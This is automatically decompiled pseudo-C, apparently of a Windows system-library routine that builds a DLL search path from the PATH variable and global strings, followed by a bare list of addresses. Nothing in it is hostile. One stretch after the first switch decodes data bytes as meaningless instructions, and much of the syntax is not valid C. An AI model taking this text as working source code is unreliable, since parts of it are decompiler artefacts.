                                                                      			E01342581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1546912048) {
                                                                      				signed int _v8;
                                                                      				signed int _v16;
                                                                      				unsigned int _v24;
                                                                      				void* _v28;
                                                                      				signed int _v32;
                                                                      				unsigned int _v36;
                                                                      				signed int _v37;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				intOrPtr _v60;
                                                                      				signed int _v64;
                                                                      				signed int _v68;
                                                                      				signed int _v72;
                                                                      				signed int _v76;
                                                                      				signed int _v80;
                                                                      				signed int _t240;
                                                                      				signed char _t244;
                                                                      				signed char _t247;
                                                                      				void* _t248;
                                                                      				signed int _t249;
                                                                      				signed char _t250;
                                                                      				signed char _t251;
                                                                      				signed char _t252;
                                                                      				signed int _t255;
                                                                      				signed int _t257;
                                                                      				intOrPtr _t259;
                                                                      				signed int _t262;
                                                                      				signed int _t269;
                                                                      				signed int _t272;
                                                                      				signed int _t280;
                                                                      				intOrPtr _t286;
                                                                      				signed int _t288;
                                                                      				signed int _t290;
                                                                      				void* _t291;
                                                                      				signed int _t292;
                                                                      				unsigned int _t295;
                                                                      				signed int _t299;
                                                                      				intOrPtr* _t300;
                                                                      				signed int _t301;
                                                                      				signed int _t305;
                                                                      				intOrPtr _t317;
                                                                      				signed int _t326;
                                                                      				signed int _t328;
                                                                      				signed int _t329;
                                                                      				signed int _t333;
                                                                      				signed int _t334;
                                                                      				void* _t336;
                                                                      				signed int _t339;
                                                                      				signed int _t341;
                                                                      				signed int _t344;
                                                                      				signed int _t345;
                                                                      				void* _t347;
                                                                      
                                                                      				_t341 = _t344;
                                                                      				_t345 = _t344 - 0x4c;
                                                                      				_v8 =  *0x140d360 ^ _t341;
                                                                      				_push(__ebx);
                                                                      				_push(__esi);
                                                                      				_push(__edi);
                                                                      				_t333 = 0x140b2e8;
                                                                      				_v56 = _a4;
                                                                      				_v48 = __edx;
                                                                      				_v60 = __ecx;
                                                                      				_t295 = 0;
                                                                      				_v80 = 0;
                                                                      				asm("movsd");
                                                                      				_v64 = 0;
                                                                      				_v76 = 0;
                                                                      				_v72 = 0;
                                                                      				asm("movsd");
                                                                      				_v44 = 0;
                                                                      				_v52 = 0;
                                                                      				_v68 = 0;
                                                                      				asm("movsd");
                                                                      				_v32 = 0;
                                                                      				_v36 = 0;
                                                                      				asm("movsd");
                                                                      				_v16 = 0;
                                                                      				_t286 = 0x48;
                                                                      				_t315 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                                                                      				_t326 = 0;
                                                                      				_v37 = _t315;
                                                                      				if(_v48 <= 0) {
                                                                      					L16:
                                                                      					_t45 = _t286 - 0x48; // 0x0
                                                                      					__eflags = _t45 - 0xfffe;
                                                                      					if(_t45 > 0xfffe) {
                                                                      						_t334 = 0xc0000106;
                                                                      						goto L32;
                                                                      					} else {
                                                                      						_t333 = L01334620(_t295,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t286);
                                                                      						_v52 = _t333;
                                                                      						__eflags = _t333;
                                                                      						if(_t333 == 0) {
                                                                      							_t334 = 0xc0000017;
                                                                      							goto L32;
                                                                      						} else {
                                                                      							 *(_t333 + 0x44) =  *(_t333 + 0x44) & 0x00000000;
                                                                      							_t50 = _t333 + 0x48; // 0x48
                                                                      							_t328 = _t50;
                                                                      							_t315 = _v32;
                                                                      							 *((intOrPtr*)(_t333 + 0x3c)) = _t286;
                                                                      							_t288 = 0;
                                                                      							 *((short*)(_t333 + 0x30)) = _v48;
                                                                      							__eflags = _t315;
                                                                      							if(_t315 != 0) {
                                                                      								 *(_t333 + 0x18) = _t328;
                                                                      								__eflags = _t315 - 0x1408478;
                                                                      								 *_t333 = ((0 | _t315 == 0x01408478) - 0x00000001 & 0xfffffffb) + 7;
                                                                      								E0135F3E0(_t328,  *((intOrPtr*)(_t315 + 4)),  *_t315 & 0x0000ffff);
                                                                      								_t315 = _v32;
                                                                      								_t345 = _t345 + 0xc;
                                                                      								_t288 = 1;
                                                                      								__eflags = _a8;
                                                                      								_t328 = _t328 + (( *_t315 & 0x0000ffff) >> 1) * 2;
                                                                      								if(_a8 != 0) {
                                                                      									_t280 = E013A39F2(_t328);
                                                                      									_t315 = _v32;
                                                                      									_t328 = _t280;
                                                                      								}
                                                                      							}
                                                                      							_t299 = 0;
                                                                      							_v16 = 0;
                                                                      							__eflags = _v48;
                                                                      							if(_v48 <= 0) {
                                                                      								L31:
                                                                      								_t334 = _v68;
                                                                      								__eflags = 0;
                                                                      								 *((short*)(_t328 - 2)) = 0;
                                                                      								goto L32;
                                                                      							} else {
                                                                      								_t290 = _t333 + _t288 * 4;
                                                                      								_v56 = _t290;
                                                                      								do {
                                                                      									__eflags = _t315;
                                                                      									if(_t315 != 0) {
                                                                      										_t240 =  *(_v60 + _t299 * 4);
                                                                      										__eflags = _t240;
                                                                      										if(_t240 == 0) {
                                                                      											goto L30;
                                                                      										} else {
                                                                      											__eflags = _t240 == 5;
                                                                      											if(_t240 == 5) {
                                                                      												goto L30;
                                                                      											} else {
                                                                      												goto L22;
                                                                      											}
                                                                      										}
                                                                      									} else {
                                                                      										L22:
                                                                      										 *_t290 =  *(_v60 + _t299 * 4);
                                                                      										 *(_t290 + 0x18) = _t328;
                                                                      										_t244 =  *(_v60 + _t299 * 4);
                                                                      										__eflags = _t244 - 8;
                                                                      										if(_t244 > 8) {
                                                                      											goto L56;
                                                                      										} else {
                                                                      											switch( *((intOrPtr*)(_t244 * 4 +  &M01342959))) {
                                                                      												case 0:
                                                                      													__ax =  *0x1408488;
                                                                      													__eflags = __ax;
                                                                      													if(__ax == 0) {
                                                                      														goto L29;
                                                                      													} else {
                                                                      														__ax & 0x0000ffff = E0135F3E0(__edi,  *0x140848c, __ax & 0x0000ffff);
                                                                      														__eax =  *0x1408488 & 0x0000ffff;
                                                                      														goto L26;
                                                                      													}
                                                                      													goto L108;
                                                                      												case 1:
                                                                      													L45:
                                                                      													E0135F3E0(_t328, _v80, _v64);
                                                                      													_t275 = _v64;
                                                                      													goto L26;
                                                                      												case 2:
                                                                      													 *0x1408480 & 0x0000ffff = E0135F3E0(__edi,  *0x1408484,  *0x1408480 & 0x0000ffff);
                                                                      													__eax =  *0x1408480 & 0x0000ffff;
                                                                      													__eax = ( *0x1408480 & 0x0000ffff) >> 1;
                                                                      													__edi = __edi + __eax * 2;
                                                                      													goto L28;
                                                                      												case 3:
                                                                      													__eax = _v44;
                                                                      													__eflags = __eax;
                                                                      													if(__eax == 0) {
                                                                      														goto L29;
                                                                      													} else {
                                                                      														__esi = __eax + __eax;
                                                                      														__eax = E0135F3E0(__edi, _v72, __esi);
                                                                      														__edi = __edi + __esi;
                                                                      														__esi = _v52;
                                                                      														goto L27;
                                                                      													}
                                                                      													goto L108;
                                                                      												case 4:
                                                                      													_push(0x2e);
                                                                      													_pop(__eax);
                                                                      													 *(__esi + 0x44) = __edi;
                                                                      													 *__edi = __ax;
                                                                      													__edi = __edi + 4;
                                                                      													_push(0x3b);
                                                                      													_pop(__eax);
                                                                      													 *(__edi - 2) = __ax;
                                                                      													goto L29;
                                                                      												case 5:
                                                                      													__eflags = _v36;
                                                                      													if(_v36 == 0) {
                                                                      														goto L45;
                                                                      													} else {
                                                                      														E0135F3E0(_t328, _v76, _v36);
                                                                      														_t275 = _v36;
                                                                      													}
                                                                      													L26:
                                                                      													_t345 = _t345 + 0xc;
                                                                      													_t328 = _t328 + (_t275 >> 1) * 2 + 2;
                                                                      													__eflags = _t328;
                                                                      													L27:
                                                                      													_push(0x3b);
                                                                      													_pop(_t277);
                                                                      													 *((short*)(_t328 - 2)) = _t277;
                                                                      													goto L28;
                                                                      												case 6:
                                                                      													__ebx =  *0x140575c;
                                                                      													__eflags = __ebx - 0x140575c;
                                                                      													if(__ebx != 0x140575c) {
                                                                      														_push(0x3b);
                                                                      														_pop(__esi);
                                                                      														do {
                                                                      															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                                                      															E0135F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                                                      															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                                                      															__edi = __edi + __eax * 2;
                                                                      															__edi = __edi + 2;
                                                                      															 *(__edi - 2) = __si;
                                                                      															__ebx =  *__ebx;
                                                                      															__eflags = __ebx - 0x140575c;
                                                                      														} while (__ebx != 0x140575c);
                                                                      														__esi = _v52;
                                                                      														__ecx = _v16;
                                                                      														__edx = _v32;
                                                                      													}
                                                                      													__ebx = _v56;
                                                                      													goto L29;
                                                                      												case 7:
                                                                      													 *0x1408478 & 0x0000ffff = E0135F3E0(__edi,  *0x140847c,  *0x1408478 & 0x0000ffff);
                                                                      													__eax =  *0x1408478 & 0x0000ffff;
                                                                      													__eax = ( *0x1408478 & 0x0000ffff) >> 1;
                                                                      													__eflags = _a8;
                                                                      													__edi = __edi + __eax * 2;
                                                                      													if(_a8 != 0) {
                                                                      														__ecx = __edi;
                                                                      														__eax = E013A39F2(__ecx);
                                                                      														__edi = __eax;
                                                                      													}
                                                                      													goto L28;
                                                                      												case 8:
                                                                      													__eax = 0;
                                                                      													 *(__edi - 2) = __ax;
                                                                      													 *0x1406e58 & 0x0000ffff = E0135F3E0(__edi,  *0x1406e5c,  *0x1406e58 & 0x0000ffff);
                                                                      													 *(__esi + 0x38) = __edi;
                                                                      													__eax =  *0x1406e58 & 0x0000ffff;
                                                                      													__eax = ( *0x1406e58 & 0x0000ffff) >> 1;
                                                                      													__edi = __edi + __eax * 2;
                                                                      													__edi = __edi + 2;
                                                                      													L28:
                                                                      													_t299 = _v16;
                                                                      													_t315 = _v32;
                                                                      													L29:
                                                                      													_t290 = _t290 + 4;
                                                                      													__eflags = _t290;
                                                                      													_v56 = _t290;
                                                                      													goto L30;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      									goto L108;
                                                                      									L30:
                                                                      									_t299 = _t299 + 1;
                                                                      									_v16 = _t299;
                                                                      									__eflags = _t299 - _v48;
                                                                      								} while (_t299 < _v48);
                                                                      								goto L31;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					while(1) {
                                                                      						L1:
                                                                      						_t244 =  *(_v60 + _t326 * 4);
                                                                      						if(_t244 > 8) {
                                                                      							break;
                                                                      						}
                                                                      						switch( *((intOrPtr*)(_t244 * 4 +  &M01342935))) {
                                                                      							case 0:
                                                                      								__ax =  *0x1408488;
                                                                      								__eflags = __ax;
                                                                      								if(__ax != 0) {
                                                                      									__eax = __ax & 0x0000ffff;
                                                                      									__ebx = __ebx + 2;
                                                                      									__eflags = __ebx;
                                                                      									goto L53;
                                                                      								}
                                                                      								goto L14;
                                                                      							case 1:
                                                                      								L44:
                                                                      								_t315 =  &_v64;
                                                                      								_v80 = E01342E3E(0,  &_v64);
                                                                      								_t286 = _t286 + _v64 + 2;
                                                                      								goto L13;
                                                                      							case 2:
                                                                      								__eax =  *0x1408480 & 0x0000ffff;
                                                                      								__ebx = __ebx + __eax;
                                                                      								__eflags = __dl;
                                                                      								if(__dl != 0) {
                                                                      									__eax = 0x1408480;
                                                                      									goto L80;
                                                                      								}
                                                                      								goto L14;
                                                                      							case 3:
                                                                      								__eax = E0132EEF0(0x14079a0);
                                                                      								__eax =  &_v44;
                                                                      								_push(__eax);
                                                                      								_push(0);
                                                                      								_push(0);
                                                                      								_push(4);
                                                                      								_push(L"PATH");
                                                                      								_push(0);
                                                                      								L57();
                                                                      								__esi = __eax;
                                                                      								_v68 = __esi;
                                                                      								__eflags = __esi - 0xc0000023;
                                                                      								if(__esi != 0xc0000023) {
                                                                      									L10:
                                                                      									__eax = E0132EB70(__ecx, 0x14079a0);
                                                                      									__eflags = __esi - 0xc0000100;
                                                                      									if(__esi == 0xc0000100) {
                                                                      										_v44 = _v44 & 0x00000000;
                                                                      										__eax = 0;
                                                                      										_v68 = 0;
                                                                      										goto L13;
                                                                      									} else {
                                                                      										__eflags = __esi;
                                                                      										if(__esi < 0) {
                                                                      											L32:
                                                                      											_t218 = _v72;
                                                                      											__eflags = _t218;
                                                                      											if(_t218 != 0) {
                                                                      												L013377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
                                                                      											}
                                                                      											_t219 = _v52;
                                                                      											__eflags = _t219;
                                                                      											if(_t219 != 0) {
                                                                      												__eflags = _t334;
                                                                      												if(_t334 < 0) {
                                                                      													L013377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219);
                                                                      													_t219 = 0;
                                                                      												}
                                                                      											}
                                                                      											goto L36;
                                                                      										} else {
                                                                      											__eax = _v44;
                                                                      											__ebx = __ebx + __eax * 2;
                                                                      											__ebx = __ebx + 2;
                                                                      											__eflags = __ebx;
                                                                      											L13:
                                                                      											_t295 = _v36;
                                                                      											goto L14;
                                                                      										}
                                                                      									}
                                                                      								} else {
                                                                      									__eax = _v44;
                                                                      									__ecx =  *0x1407b9c; // 0x0
                                                                      									_v44 + _v44 =  *[fs:0x30];
                                                                      									__ecx = __ecx + 0x180000;
                                                                      									__eax = L01334620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                                                      									_v72 = __eax;
                                                                      									__eflags = __eax;
                                                                      									if(__eax == 0) {
                                                                      										__eax = E0132EB70(__ecx, 0x14079a0);
                                                                      										__eax = _v52;
                                                                      										L36:
                                                                      										_pop(_t327);
                                                                      										_pop(_t335);
                                                                      										__eflags = _v8 ^ _t341;
                                                                      										_pop(_t287);
                                                                      										return E0135B640(_t219, _t287, _v8 ^ _t341, _t315, _t327, _t335);
                                                                      									} else {
                                                                      										__ecx =  &_v44;
                                                                      										_push(__ecx);
                                                                      										_push(_v44);
                                                                      										_push(__eax);
                                                                      										_push(4);
                                                                      										_push(L"PATH");
                                                                      										_push(0);
                                                                      										L57();
                                                                      										__esi = __eax;
                                                                      										_v68 = __eax;
                                                                      										goto L10;
                                                                      									}
                                                                      								}
                                                                      								goto L108;
                                                                      							case 4:
                                                                      								__ebx = __ebx + 4;
                                                                      								goto L14;
                                                                      							case 5:
                                                                      								_t282 = _v56;
                                                                      								if(_v56 != 0) {
                                                                      									_t315 =  &_v36;
                                                                      									_t284 = E01342E3E(_t282,  &_v36);
                                                                      									_t295 = _v36;
                                                                      									_v76 = _t284;
                                                                      								}
                                                                      								if(_t295 == 0) {
                                                                      									goto L44;
                                                                      								} else {
                                                                      									_t286 = _t286 + 2 + _t295;
                                                                      								}
                                                                      								goto L14;
                                                                      							case 6:
                                                                      								__eax =  *0x1405764 & 0x0000ffff;
                                                                      								goto L53;
                                                                      							case 7:
                                                                      								__eax =  *0x1408478 & 0x0000ffff;
                                                                      								__ebx = __ebx + __eax;
                                                                      								__eflags = _a8;
                                                                      								if(_a8 != 0) {
                                                                      									__ebx = __ebx + 0x16;
                                                                      									__ebx = __ebx + __eax;
                                                                      								}
                                                                      								__eflags = __dl;
                                                                      								if(__dl != 0) {
                                                                      									__eax = 0x1408478;
                                                                      									L80:
                                                                      									_v32 = __eax;
                                                                      								}
                                                                      								goto L14;
                                                                      							case 8:
                                                                      								__eax =  *0x1406e58 & 0x0000ffff;
                                                                      								__eax = ( *0x1406e58 & 0x0000ffff) + 2;
                                                                      								L53:
                                                                      								__ebx = __ebx + __eax;
                                                                      								L14:
                                                                      								_t326 = _t326 + 1;
                                                                      								if(_t326 >= _v48) {
                                                                      									goto L16;
                                                                      								} else {
                                                                      									_t315 = _v37;
                                                                      									goto L1;
                                                                      								}
                                                                      								goto L108;
                                                                      						}
                                                                      					}
                                                                      					L56:
                                                                      					_t300 = 0x25;
                                                                      					asm("int 0x29");
                                                                      					asm("out 0x28, al");
                                                                      					asm("o16 sub [ecx+eax], dh");
                                                                      					asm("loopne 0x29");
                                                                      					_t247 = _t244 ^ 1;
                                                                      					_t336 = _t333 + 1;
                                                                      					 *((intOrPtr*)(_t300 + _t247)) =  *((intOrPtr*)(_t300 + _t247)) - _t315;
                                                                      					_t248 = _t247 + 0x1f013426;
                                                                      					_pop(_t291);
                                                                      					__eflags =  *_t300 - _t248;
                                                                      					_t249 = _t345;
                                                                      					_t347 = _t248;
                                                                      					 *((intOrPtr*)(_t300 + _t249)) =  *((intOrPtr*)(_t300 + _t249)) - _t315;
                                                                      					_t250 = _t249 ^ 0x0201385b;
                                                                      					 *((intOrPtr*)(_t300 + _t250)) =  *((intOrPtr*)(_t300 + _t250)) - _t336;
                                                                      					 *_t250 =  *_t250 - 0x34;
                                                                      					asm("daa");
                                                                      					_t251 = _t250 ^ 0x00000001;
                                                                      					_push(ds);
                                                                      					 *((intOrPtr*)(_t300 + _t251)) =  *((intOrPtr*)(_t300 + _t251)) - _t315;
                                                                      					_t338 = _t336 + _t336 - 1;
                                                                      					 *((intOrPtr*)(_t300 + _t251)) =  *((intOrPtr*)(_t300 + _t251)) - _t315;
                                                                      					asm("daa");
                                                                      					_t252 = _t251 ^ 0x00000001;
                                                                      					asm("fcomp dword [ebx+0x38]");
                                                                      					 *((intOrPtr*)(_t252 +  &_a1546912048)) =  *((intOrPtr*)(_t252 +  &_a1546912048)) + _t336 + _t336 - 1;
                                                                      					__eflags =  *_t300 - _t252;
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					_push(0x20);
                                                                      					_push(0x13eff00);
                                                                      					E0136D08C(_t291, _t328, _t338);
                                                                      					_v44 =  *[fs:0x18];
                                                                      					_t329 = 0;
                                                                      					 *_a24 = 0;
                                                                      					_t292 = _a12;
                                                                      					__eflags = _t292;
                                                                      					if(_t292 == 0) {
                                                                      						_t255 = 0xc0000100;
                                                                      					} else {
                                                                      						_v8 = 0;
                                                                      						_t339 = 0xc0000100;
                                                                      						_v52 = 0xc0000100;
                                                                      						_t257 = 4;
                                                                      						while(1) {
                                                                      							_v40 = _t257;
                                                                      							__eflags = _t257;
                                                                      							if(_t257 == 0) {
                                                                      								break;
                                                                      							}
                                                                      							_t305 = _t257 * 0xc;
                                                                      							_v48 = _t305;
                                                                      							__eflags = _t292 -  *((intOrPtr*)(_t305 + 0x12f1664));
                                                                      							if(__eflags <= 0) {
                                                                      								if(__eflags == 0) {
                                                                      									_t272 = E0135E5C0(_a8,  *((intOrPtr*)(_t305 + 0x12f1668)), _t292);
                                                                      									_t347 = _t347 + 0xc;
                                                                      									__eflags = _t272;
                                                                      									if(__eflags == 0) {
                                                                      										_t339 = E013951BE(_t292,  *((intOrPtr*)(_v48 + 0x12f166c)), _a16, _t329, _t339, __eflags, _a20, _a24);
                                                                      										_v52 = _t339;
                                                                      										break;
                                                                      									} else {
                                                                      										_t257 = _v40;
                                                                      										goto L62;
                                                                      									}
                                                                      									goto L70;
                                                                      								} else {
                                                                      									L62:
                                                                      									_t257 = _t257 - 1;
                                                                      									continue;
                                                                      								}
                                                                      							}
                                                                      							break;
                                                                      						}
                                                                      						_v32 = _t339;
                                                                      						__eflags = _t339;
                                                                      						if(_t339 < 0) {
                                                                      							__eflags = _t339 - 0xc0000100;
                                                                      							if(_t339 == 0xc0000100) {
                                                                      								_t301 = _a4;
                                                                      								__eflags = _t301;
                                                                      								if(_t301 != 0) {
                                                                      									_v36 = _t301;
                                                                      									__eflags =  *_t301 - _t329;
                                                                      									if( *_t301 == _t329) {
                                                                      										_t339 = 0xc0000100;
                                                                      										goto L76;
                                                                      									} else {
                                                                      										_t317 =  *((intOrPtr*)(_v44 + 0x30));
                                                                      										_t259 =  *((intOrPtr*)(_t317 + 0x10));
                                                                      										__eflags =  *((intOrPtr*)(_t259 + 0x48)) - _t301;
                                                                      										if( *((intOrPtr*)(_t259 + 0x48)) == _t301) {
                                                                      											__eflags =  *(_t317 + 0x1c);
                                                                      											if( *(_t317 + 0x1c) == 0) {
                                                                      												L106:
                                                                      												_t339 = E01342AE4( &_v36, _a8, _t292, _a16, _a20, _a24);
                                                                      												_v32 = _t339;
                                                                      												__eflags = _t339 - 0xc0000100;
                                                                      												if(_t339 != 0xc0000100) {
                                                                      													goto L69;
                                                                      												} else {
                                                                      													_t329 = 1;
                                                                      													_t301 = _v36;
                                                                      													goto L75;
                                                                      												}
                                                                      											} else {
                                                                      												_t262 = E01326600( *(_t317 + 0x1c));
                                                                      												__eflags = _t262;
                                                                      												if(_t262 != 0) {
                                                                      													goto L106;
                                                                      												} else {
                                                                      													_t301 = _a4;
                                                                      													goto L75;
                                                                      												}
                                                                      											}
                                                                      										} else {
                                                                      											L75:
                                                                      											_t339 = E01342C50(_t301, _a8, _t292, _a16, _a20, _a24, _t329);
                                                                      											L76:
                                                                      											_v32 = _t339;
                                                                      											goto L69;
                                                                      										}
                                                                      									}
                                                                      									goto L108;
                                                                      								} else {
                                                                      									E0132EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                      									_v8 = 1;
                                                                      									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                                                      									_t339 = _a24;
                                                                      									_t269 = E01342AE4( &_v36, _a8, _t292, _a16, _a20, _t339);
                                                                      									_v32 = _t269;
                                                                      									__eflags = _t269 - 0xc0000100;
                                                                      									if(_t269 == 0xc0000100) {
                                                                      										_v32 = E01342C50(_v36, _a8, _t292, _a16, _a20, _t339, 1);
                                                                      									}
                                                                      									_v8 = _t329;
                                                                      									E01342ACB();
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L69:
                                                                      						_v8 = 0xfffffffe;
                                                                      						_t255 = _t339;
                                                                      					}
                                                                      					L70:
                                                                      					return E0136D0D1(_t255);
                                                                      				}
                                                                      				L108:
                                                                      			}


























































                                                                      0x01342584
                                                                      0x01342586
                                                                      0x01342590
                                                                      0x01342596
                                                                      0x01342597
                                                                      0x01342598
                                                                      0x01342599
                                                                      0x0134259e
                                                                      0x013425a4
                                                                      0x013425a9
                                                                      0x013425ac
                                                                      0x013425ae
                                                                      0x013425b1
                                                                      0x013425b2
                                                                      0x013425b5
                                                                      0x013425b8
                                                                      0x013425bb
                                                                      0x013425bc
                                                                      0x013425bf
                                                                      0x013425c2
                                                                      0x013425c5
                                                                      0x013425c6
                                                                      0x013425cb
                                                                      0x013425ce
                                                                      0x013425d8
                                                                      0x013425dd
                                                                      0x013425de
                                                                      0x013425e1
                                                                      0x013425e3
                                                                      0x013425e9
                                                                      0x013426da
                                                                      0x013426da
                                                                      0x013426dd
                                                                      0x013426e2
                                                                      0x01385b56
                                                                      0x00000000
                                                                      0x013426e8
                                                                      0x013426f9
                                                                      0x013426fb
                                                                      0x013426fe
                                                                      0x01342700
                                                                      0x01385b60
                                                                      0x00000000
                                                                      0x01342706
                                                                      0x01342706
                                                                      0x0134270a
                                                                      0x0134270a
                                                                      0x0134270d
                                                                      0x01342713
                                                                      0x01342716
                                                                      0x01342718
                                                                      0x0134271c
                                                                      0x0134271e
                                                                      0x01385b6c
                                                                      0x01385b6f
                                                                      0x01385b7f
                                                                      0x01385b89
                                                                      0x01385b8e
                                                                      0x01385b93
                                                                      0x01385b96
                                                                      0x01385b9c
                                                                      0x01385ba0
                                                                      0x01385ba3
                                                                      0x01385bab
                                                                      0x01385bb0
                                                                      0x01385bb3
                                                                      0x01385bb3
                                                                      0x01385ba3
                                                                      0x01342724
                                                                      0x01342726
                                                                      0x01342729
                                                                      0x0134272c
                                                                      0x0134279d
                                                                      0x0134279d
                                                                      0x013427a0
                                                                      0x013427a2
                                                                      0x00000000
                                                                      0x0134272e
                                                                      0x0134272e
                                                                      0x01342731
                                                                      0x01342734
                                                                      0x01342734
                                                                      0x01342736
                                                                      0x01385bc1
                                                                      0x01385bc1
                                                                      0x01385bc4
                                                                      0x00000000
                                                                      0x01385bca
                                                                      0x01385bca
                                                                      0x01385bcd
                                                                      0x00000000
                                                                      0x01385bd3
                                                                      0x00000000
                                                                      0x01385bd3
                                                                      0x01385bcd
                                                                      0x0134273c
                                                                      0x0134273c
                                                                      0x01342742
                                                                      0x01342747
                                                                      0x0134274a
                                                                      0x0134274d
                                                                      0x01342750
                                                                      0x00000000
                                                                      0x01342756
                                                                      0x01342756
                                                                      0x00000000
                                                                      0x01342902
                                                                      0x01342908
                                                                      0x0134290b
                                                                      0x00000000
                                                                      0x01342911
                                                                      0x0134291c
                                                                      0x01342921
                                                                      0x00000000
                                                                      0x01342921
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01342880
                                                                      0x01342887
                                                                      0x0134288c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01342805
                                                                      0x0134280a
                                                                      0x01342814
                                                                      0x01342816
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0134281e
                                                                      0x01342821
                                                                      0x01342823
                                                                      0x00000000
                                                                      0x01342829
                                                                      0x01342829
                                                                      0x01342831
                                                                      0x0134283c
                                                                      0x0134283e
                                                                      0x00000000
                                                                      0x0134283e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0134284e
                                                                      0x01342850
                                                                      0x01342851
                                                                      0x01342854
                                                                      0x01342857
                                                                      0x0134285a
                                                                      0x0134285c
                                                                      0x0134285d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0134275d
                                                                      0x01342761
                                                                      0x00000000
                                                                      0x01342767
                                                                      0x0134276e
                                                                      0x01342773
                                                                      0x01342773
                                                                      0x01342776
                                                                      0x01342778
                                                                      0x0134277e
                                                                      0x0134277e
                                                                      0x01342781
                                                                      0x01342781
                                                                      0x01342783
                                                                      0x01342784
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01385bd8
                                                                      0x01385bde
                                                                      0x01385be4
                                                                      0x01385be6
                                                                      0x01385be8
                                                                      0x01385be9
                                                                      0x01385bee
                                                                      0x01385bf8
                                                                      0x01385bff
                                                                      0x01385c01
                                                                      0x01385c04
                                                                      0x01385c07
                                                                      0x01385c0b
                                                                      0x01385c0d
                                                                      0x01385c0d
                                                                      0x01385c15
                                                                      0x01385c18
                                                                      0x01385c1b
                                                                      0x01385c1b
                                                                      0x01385c1e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x013428c3
                                                                      0x013428c8
                                                                      0x013428d2
                                                                      0x013428d4
                                                                      0x013428d8
                                                                      0x013428db
                                                                      0x01385c26
                                                                      0x01385c28
                                                                      0x01385c2d
                                                                      0x01385c2d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01385c34
                                                                      0x01385c36
                                                                      0x01385c49
                                                                      0x01385c4e
                                                                      0x01385c54
                                                                      0x01385c5b
                                                                      0x01385c5d
                                                                      0x01385c60
                                                                      0x01342788
                                                                      0x01342788
                                                                      0x0134278b
                                                                      0x0134278e
                                                                      0x0134278e
                                                                      0x0134278e
                                                                      0x01342791
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01342756
                                                                      0x01342750
                                                                      0x00000000
                                                                      0x01342794
                                                                      0x01342794
                                                                      0x01342795
                                                                      0x01342798
                                                                      0x01342798
                                                                      0x00000000
                                                                      0x01342734
                                                                      0x0134272c
                                                                      0x01342700
                                                                      0x013425ef
                                                                      0x013425ef
                                                                      0x013425ef
                                                                      0x013425f2
                                                                      0x013425f8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x013425fe
                                                                      0x00000000
                                                                      0x013428e6
                                                                      0x013428ec
                                                                      0x013428ef
                                                                      0x013428f5
                                                                      0x013428f8
                                                                      0x013428f8
                                                                      0x00000000
                                                                      0x013428f8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01342866
                                                                      0x01342866
                                                                      0x01342876
                                                                      0x01342879
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x013427e0
                                                                      0x013427e7
                                                                      0x013427e9
                                                                      0x013427eb
                                                                      0x01385afd
                                                                      0x00000000
                                                                      0x01385afd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01342633
                                                                      0x01342638
                                                                      0x0134263b
                                                                      0x0134263c
                                                                      0x0134263e
                                                                      0x01342640
                                                                      0x01342642
                                                                      0x01342647
                                                                      0x01342649
                                                                      0x0134264e
                                                                      0x01342650
                                                                      0x01342653
                                                                      0x01342659
                                                                      0x013426a2
                                                                      0x013426a7
                                                                      0x013426ac
                                                                      0x013426b2
                                                                      0x01385b11
                                                                      0x01385b15
                                                                      0x01385b17
                                                                      0x00000000
                                                                      0x013426b8
                                                                      0x013426b8
                                                                      0x013426ba
                                                                      0x013427a6
                                                                      0x013427a6
                                                                      0x013427a9
                                                                      0x013427ab
                                                                      0x013427b9
                                                                      0x013427b9
                                                                      0x013427be
                                                                      0x013427c1
                                                                      0x013427c3
                                                                      0x013427c5
                                                                      0x013427c7
                                                                      0x01385c74
                                                                      0x01385c79
                                                                      0x01385c79
                                                                      0x013427c7
                                                                      0x00000000
                                                                      0x013426c0
                                                                      0x013426c0
                                                                      0x013426c3
                                                                      0x013426c6
                                                                      0x013426c6
                                                                      0x013426c9
                                                                      0x013426c9
                                                                      0x00000000
                                                                      0x013426c9
                                                                      0x013426ba
                                                                      0x0134265b
                                                                      0x0134265b
                                                                      0x0134265e
                                                                      0x01342667
                                                                      0x0134266d
                                                                      0x01342677
